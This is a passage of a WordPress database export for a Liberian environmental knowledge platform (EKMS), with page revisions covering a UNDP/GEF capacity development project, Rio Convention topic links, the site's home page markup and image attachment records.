Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p style=\"background-color: lightgray;\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-13 10:03:54','2019-11-13 10:03:54','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(2018,1,'2019-11-13 18:19:47','2019-11-13 18:19:47','Coming up','Land Use','','inherit','closed','closed','','486-autosave-v1','','','2019-11-13 18:19:47','2019-11-13 18:19:47','',486,'https://ekmsliberia.info/486-autosave-v1/',0,'revision','',0),(2020,1,'2019-11-13 18:37:36','2019-11-13 18:37:36','<h2>The United Nations Convention on Biological Diversity</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>\n			<h2>The United Nations Framework Convention on Climate Change</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n			<h2>The United Nations Convention to Combat Desertification</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land and Drought</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-13 18:37:36','2019-11-13 18:37:36','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2021,1,'2019-11-13 18:38:01','2019-11-13 18:38:01','<h2>The United Nations Convention on Biological Diversity</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>\n			<h2>The United Nations Framework Convention on Climate Change</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n			<h2>The United Nations Convention to Combat Desertification</h2>		\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land and Drought</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-13 18:38:01','2019-11-13 18:38:01','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2022,1,'2019-11-13 18:41:21','2019-11-13 18:41:21','<h2>The United Nations Convention on Biological Diversity</h2>\n<h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>\n<h2>The United Nations Framework Convention on Climate Change</h2>\n<h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n<h2>The United Nations Convention to Combat Desertification</h2>\n<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land and Drought</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n<h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>','Related Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-13 18:41:21','2019-11-13 18:41:21','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(2023,1,'2019-11-14 06:10:29','2019-11-14 06:10:29','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-14 06:10:29','2019-11-14 06:10:29','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2035,1,'2019-11-14 06:25:59','2019-11-14 06:25:59','','featured_epa','','inherit','open','closed','','featured_epa','','','2019-11-14 06:25:59','2019-11-14 06:25:59','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_epa.jpg',0,'attachment','image/jpeg',0),(2036,1,'2019-11-14 06:26:01','2019-11-14 06:26:01','','featured_home1','','inherit','open','closed','','featured_home1','','','2019-11-14 06:26:01','2019-11-14 06:26:01','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_home1.jpg',0,'attachment','image/jpeg',0),(2037,1,'2019-11-14 06:26:03','2019-11-14 06:26:03','','featured_home2','','inherit','open','closed','','featured_home2','','','2019-11-14 06:26:03','2019-11-14 06:26:03','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_home2.jpg',0,'attachment','image/jpeg',0),(2038,1,'2019-11-14 06:26:04','2019-11-14 06:26:04','','featured_home3','','inherit','open','closed','','featured_home3','','','2019-11-14 06:26:04','2019-11-14 06:26:04','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_home3.jpg',0,'attachment','image/jpeg',0),(2039,1,'2019-11-14 06:26:05','2019-11-14 06:26:05','','featured_maps','','inherit','open','closed','','featured_maps','','','2019-11-14 06:26:05','2019-11-14 06:26:05','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_maps.jpg',0,'attachment','image/jpeg',0),(2040,1,'2019-11-14 06:26:34','2019-11-14 06:26:34','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option 